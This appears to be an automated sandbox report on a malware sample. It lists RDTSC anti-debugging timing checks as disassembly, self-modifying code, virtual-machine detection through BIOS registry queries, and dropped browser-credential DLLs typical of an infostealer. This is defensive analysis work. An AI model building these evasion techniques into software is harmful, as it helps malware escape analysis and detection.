Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6D31BB second address: 6D31BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E2580 second address: 6E2586 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E2586 second address: 6E2592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E2592 second address: 6E2596 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E2596 second address: 6E259A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E1FC7 second address: 6E1FFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2810BC4672h 0x00000008 jmp 00007F2810BC466Ch 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007F2810BC466Ch 0x00000017 jp 00007F2810BC4666h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E1FFC second address: 6E2000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E6F3E second address: 6E6F44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E6F44 second address: 6E6F4E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F28107458A2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E6F4E second address: 6E6F6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2810BC4666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jbe 00007F2810BC4666h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E6F6A second address: 6E6F6F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6E6F6F second address: 6E6F75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EBDC9 second address: 6EBDD9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F2810745896h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6EBDD9 second address: 6EBDFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC466Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F2810BC466Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6F5D8D second address: 6F5D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FF3EB second address: 6FF3F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDC59 second address: 6FDC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDC5F second address: 6FDC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDC67 second address: 6FDC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007F281074589Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDC76 second address: 6FDC87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jc 00007F2810BC4674h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDC87 second address: 6FDC8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDE11 second address: 6FDE16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDE16 second address: 6FDE4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jp 00007F2810745896h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F28107458A2h 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push esi 0x00000016 push ebx 0x00000017 jnc 00007F2810745896h 0x0000001d jo 00007F2810745896h 0x00000023 pop ebx 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDF9A second address: 6FDFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2810BC4666h 0x0000000a pushad 0x0000000b jne 00007F2810BC4666h 0x00000011 jmp 00007F2810BC4674h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDFC1 second address: 6FDFD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 jc 00007F28107458B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDFD1 second address: 6FDFD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FDFD5 second address: 6FDFE1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE121 second address: 6FE139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2810BC4672h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE43D second address: 6FE44C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F2810745896h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE44C second address: 6FE468 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4678h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE718 second address: 6FE733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F281074589Ah 0x00000009 jmp 00007F281074589Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 6FE733 second address: 6FE741 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 709219 second address: 70921F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70921F second address: 70922F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 jp 00007F2810BC4666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70BC00 second address: 70BC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70BC04 second address: 70BC0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70BC0B second address: 70BC11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70BC11 second address: 70BC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710B72 second address: 710B99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F28107458A2h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 710B99 second address: 710BBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4679h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7142AA second address: 7142BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F2810745896h 0x0000000c popad 0x0000000d popad 0x0000000e push ebx 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F561 second address: 70F565 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F565 second address: 70F585 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F28107458A4h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F585 second address: 70F589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 70F589 second address: 70F5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F2810745898h 0x0000000c push ecx 0x0000000d jbe 00007F2810745896h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 720BF6 second address: 720C03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 720C03 second address: 720C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 720C07 second address: 720C1B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2810BC4666h 0x00000008 jnl 00007F2810BC4666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 724CA0 second address: 724CB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F281074589Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734D25 second address: 734D29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 733C3D second address: 733C49 instructions: 0x00000000 rdtsc 0x00000002 je 00007F2810745896h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 733D67 second address: 733D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F2810BC4666h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2810BC4672h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 733D87 second address: 733D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7341E3 second address: 7341EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734A09 second address: 734A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734A0E second address: 734A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F2810BC4666h 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 734A1A second address: 734A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F281074589Bh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jc 00007F281074589Eh 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7364BA second address: 7364C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2810BC4666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 738DB8 second address: 738DC7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2810745896h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7390EF second address: 7390F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7390F4 second address: 7390FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73A6B4 second address: 73A6BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73C30D second address: 73C33C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28107458A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jl 00007F28107458A4h 0x0000000f push edx 0x00000010 pop edx 0x00000011 jmp 00007F281074589Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73C33C second address: 73C346 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2810BC4672h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73C346 second address: 73C34C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 73DBDB second address: 73DBDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80248 second address: 4D80251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dx, 25EEh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80251 second address: 4D80287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2810BC4674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F2810BC466Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov esi, 4090C08Bh 0x00000016 mov bl, cl 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80287 second address: 4D8028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8028B second address: 4D80291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80291 second address: 4D802D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushfd 0x00000007 jmp 00007F28107458A9h 0x0000000c adc ecx, 37C23E36h 0x00000012 jmp 00007F28107458A1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D802D3 second address: 4D802D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D802D7 second address: 4D802EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F281074589Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80304 second address: 4D80347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushfd 0x00000008 jmp 00007F2810BC466Bh 0x0000000d adc cx, 48CEh 0x00000012 jmp 00007F2810BC4679h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F2810BC466Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80347 second address: 4D8039F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F281074589Ah 0x00000009 jmp 00007F28107458A5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 jmp 00007F28107458A1h 0x00000018 xchg eax, ebp 0x00000019 jmp 00007F281074589Eh 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F281074589Ah 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8039F second address: 4D803A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D803A3 second address: 4D803A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D803A9 second address: 4D803AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D803AF second address: 4D803B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 657201 second address: 65722A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F2810BC4666h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jc 00007F2810BC467Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 657482 second address: 657486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4B1B6A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 4B1C43 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 675CC6 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 65EEEA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 6D4595 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

API coverage: 10.0 %

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00264910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00264910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0025DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0025E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0025BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00263EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00263EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0025F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0025F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_002516D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_002638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_002638B0
